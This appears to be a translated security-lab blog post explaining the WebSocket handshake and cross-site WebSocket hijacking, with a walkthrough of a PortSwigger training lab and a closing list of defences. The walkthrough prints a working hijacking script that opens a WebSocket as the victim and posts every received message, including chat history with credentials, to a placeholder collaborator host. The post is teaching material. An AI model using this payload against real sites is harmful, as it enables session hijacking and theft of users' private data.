Analysis of websocket hijacking
2022-07-18 17:12:00 【Hetian network security laboratory】
Statement: This article is limited to technical discussion and sharing; using it in illegal ways is strictly forbidden. Readers who cause any harm to network security bear the consequences themselves; this has nothing to do with this account or the original author.
WebSocket hijacking vulnerability guide
The WebSocket protocol
WebSocket is a new protocol introduced with HTML5. It is an application-layer communication protocol built on TCP and is independent of the content of the HTTP protocol itself. Like TCP, WebSocket opens a connection with a handshake; the difference is that the WebSocket handshake is carried over HTTP. It provides an efficient, full-duplex communication channel between the client and the server over a single TCP connection.
WebSocket is a persistent protocol, whereas HTTP is not.
When the communication protocol switches from http:// or https:// to ws:// or wss://, the application has switched to communicating over WebSocket.
Establishing a WebSocket connection takes three steps: connection request, handshake, and connection establishment, as shown in the figure below (not reproduced here).

Establishing a WebSocket connection
WebSocket connections are usually created with client-side JavaScript:
var ws = new WebSocket("wss://normal-website.com/chat");
// The `wss` scheme establishes a WebSocket over an encrypted TLS connection, while the `ws` scheme uses an unencrypted connection.
To establish the connection, the browser and server perform a WebSocket handshake over HTTP. The browser sends a WebSocket handshake request like the following:
GET /chat HTTP/1.1
Host: normal-website.com
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: wDqumtseNBJdhkihL6PW7w==
Connection: keep-alive, Upgrade
Cookie: session=KOsEJNuflw4Rd9BDNrVmvwBF9rEijeE2
Upgrade: websocket
If the server accepts the connection, it returns a WebSocket handshake response like the following:
HTTP/1.1 101 Switching Protocols
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: 0FFP+2nmNIf/h+4BP36k9uzrYGk=
At this point the network connection remains open and can be used to send WebSocket messages in either direction.
The Connection and Upgrade headers in the request and response indicate that this is a WebSocket handshake.
WebSocket security vulnerabilities
In principle, because WebSocket touches many layers of an application, practically any web security vulnerability can arise in a WebSocket context:
• User input transmitted to the server is handled unsafely, leading to SQL injection, XML external entity injection, and similar issues
• Some blind vulnerabilities reached through WebSockets can only be detected with out-of-band (OAST) techniques
• If attacker-controlled data is delivered to other application users over WebSockets, it can lead to XSS or other client-side vulnerabilities

This article focuses on cross-site WebSocket hijacking (CSWSH).
Cross-site WebSocket hijacking
What is a cross-site WebSocket hijacking vulnerability?
The security features that WebSocket brings mitigate certain attacks to some degree, but as attack techniques have developed, vulnerabilities specific to it have been exposed. One of the most common is CSWSH (Cross-Site WebSocket Hijacking).
As we have seen, the WebSocket connection process is very similar to HTTP, since the WebSocket protocol is built on HTTP. The protocol does not specify how the server should verify the client's identity during the handshake, so the server has to rely on HTTP client authentication mechanisms such as cookies or HTTP basic authentication headers. This is what allows an attacker to use a malicious web page to impersonate a user and establish a WebSocket connection with the server.
The principle behind CSWSH is very similar to that of cross-site request forgery (CSRF).

Compared with CSRF, which can only send forged requests, cross-site WebSocket hijacking gives the attacker a complete bidirectional read/write channel that is not constrained by the same-origin policy, which makes it considerably more harmful and more practical to exploit.
Possible impact of a cross-site WebSocket hijacking vulnerability
• Performing unauthorized actions as the impersonated user
As with conventional CSRF, an attacker can use the forged WebSocket channel to perform sensitive operations.
• Retrieving sensitive data the user has access to
Unlike conventional CSRF, CSWSH establishes a bidirectional interactive channel, so when the application sends sensitive data back to the user, the attacker can intercept and record it.
Cross-site WebSocket hijacking lab demonstration
Target environment
• Lab
Using the Burp Suite (PortSwigger) Web Security Academy lab
Lab: Cross-site WebSocket hijacking | Web Security Academy (portswigger.net)
• Browser environment
Edge browser
Lab analysis
• Click to start the lab

• Observe that there is a real-time chat interface, and check whether a CSRF token is present (none is observed)
• Copy the following code into the exploit body
<script>
var ws = new WebSocket('wss://your-websocket-url');
ws.onopen = function() {
ws.send("READY");
};
ws.onmessage = function(event) {
fetch('https://your-collaborator-url', {method: 'POST', mode: 'no-cors', body: event.data});
};
</script>
• Replace wss://your-websocket-url with the lab's current WebSocket URL
• Replace https://your-collaborator-url with the Burp Collaborator client URL, or with a Burp Collaborator server you host yourself
• You can click "View exploit" to test it, or deliver it directly through the lab

• Then poll Burp Collaborator Client a few times
• Check the account and password in the captured chat history

Then I chose to verify it with dnslog as well


Data can indeed be exfiltrated and sensitive operations performed.
How to prevent cross-site WebSocket hijacking
• Check the Origin header
• Treat data transmitted over the WebSocket, in both directions, as untrusted
• Protect the WebSocket handshake information with cryptographic measures
• Hard-code the WebSocket endpoint URL